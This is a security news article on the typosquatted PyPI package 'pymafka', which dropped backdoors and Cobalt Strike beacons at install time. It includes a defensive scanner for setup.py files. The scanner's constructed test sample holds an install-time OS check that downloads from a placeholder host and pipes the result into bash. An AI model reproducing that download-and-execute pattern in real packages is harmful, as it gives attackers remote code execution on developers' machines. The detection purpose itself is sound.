
Corrupted PyPI Package Opens Backdoors for Different OSes

A malicious Python package has been spotted in the PyPI registry performing supply chain attacks. The aim is to drop backdoors and Cobalt Strike beacons on Linux, macOS, and Windows systems.

The malicious PyPI package

On May 17, attackers uploaded a malicious package 'pymafka' onto PyPI. The name is almost the same as PyKafka, an Apache Kafka client with over four million downloads on the PyPI registry.
  • The typosquatted package reached 325 people and could harm those affected, since it gives the attackers initial access to the developer's internal network.
  • After being reported, pymafka has since been removed from PyPI.
  • With that foothold, attackers could move laterally through the developer's network to steal data, plant additional malware, or even launch ransomware attacks.

Infection process

According to a researcher, the infection begins when the 'setup.py' script bundled in the package is executed during installation. The script identifies the host operating system and downloads a malicious payload that matches it.
  • On Linux, the Python script connects to a remote URL and pipes the response into the bash shell. What commands are executed is not known, but the script is suspected to open a reverse shell.
  • On macOS and Windows, the payload is a Cobalt Strike beacon, which gives the attacker remote access to the compromised system. Beacons are fileless shellcode agents that are difficult to detect.
  • The beacon can then be used to deliver second-stage payloads, such as ransomware, or for lateral movement and espionage.
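The install-time behaviour described above (an OS check followed by a download that is handed to a shell) is something a reviewer can look for statically before installing an unfamiliar package. The following script is an added example, not code from the article or from any real package: it parses a setup.py with Python's ast module and flags network calls, process or code execution, and OS-probing calls that co-occur at install time. Both setup.py samples are constructed for the example (the suspicious one uses a placeholder URL and is only parsed, never executed), and the function-name lists are a heuristic chosen here, not a published signature set.

```python
import ast

# Constructed sample of an ordinary setup.py (not any real project's code).
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="example-pkg", version="1.0", packages=find_packages())
'''

# Constructed sample that mirrors the pattern the article describes:
# an OS check at install time, a download, and the result piped to bash.
# It is only parsed by scan_setup_py below; the URL is a placeholder.
SUSPICIOUS_SETUP = '''
import platform, subprocess, urllib.request
from setuptools import setup
if platform.system() == "Linux":
    data = urllib.request.urlopen("https://example.invalid/stage").read()
    subprocess.run(["bash"], input=data)
setup(name="pymafka-lookalike", version="1.0")
'''


def _root_and_attr(expr):
    """For `a.b.c` return ('a', 'c'); for a bare name return (name, name)."""
    if isinstance(expr, ast.Name):
        return expr.id, expr.id
    if isinstance(expr, ast.Attribute):
        node = expr
        while isinstance(node, ast.Attribute):
            node = node.value
        if isinstance(node, ast.Name):
            return node.id, expr.attr
    return None, None


def classify(root, attr):
    """Heuristic category for a call or attribute reference (assumed lists, not a standard)."""
    if attr in {"urlopen", "urlretrieve", "create_connection"} or (
        root == "requests" and attr in {"get", "post"}
    ):
        return "network"
    if (root == "os" and attr in {"system", "popen"}) or attr in {
        "Popen", "run", "call", "check_output", "check_call", "exec", "eval"
    }:
        return "exec"
    if (root, attr) in {("platform", "system"), ("platform", "platform"),
                        ("os", "uname"), ("sys", "platform")}:
        return "os_probe"
    return None


def scan_setup_py(source):
    """Return a risk summary with the line numbers of each category of hit."""
    tree = ast.parse(source)
    hits = {"network": set(), "exec": set(), "os_probe": set()}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            cat = classify(*_root_and_attr(node.func))
        elif isinstance(node, ast.Attribute):  # catches non-call refs such as sys.platform
            cat = classify(*_root_and_attr(node))
        else:
            continue
        if cat:
            hits[cat].add(node.lineno)
    # Download plus execution in the same install script is the strongest signal;
    # either alone still deserves a manual look (false positives are expected).
    if hits["network"] and hits["exec"]:
        risk = "high"
    elif hits["network"] or hits["exec"]:
        risk = "medium"
    else:
        risk = "low"
    return {
        "risk": risk,
        "os_targeted": bool(hits["os_probe"]),
        "hits": {k: sorted(v) for k, v in hits.items()},
    }


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, scan_setup_py(src))
```

Run it against `python -c "import urllib.request,...; print(open('setup.py').read())"` output or simply `scan_setup_py(open("setup.py").read())` on a freshly downloaded sdist before installing; a "high" result with `os_targeted` set is exactly the shape of behaviour the article attributes to pymafka and warrants reading the file by hand.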

What to do?

Software developers should be careful about mistyped or typosquatted package names when pulling in libraries for their applications. They should check package names and project details closely and be deliberate about which building blocks they adopt. Developers who installed the malicious package should replace it immediately and inspect their systems for Linux backdoors and Cobalt Strike beacons.
Cyware Publisher
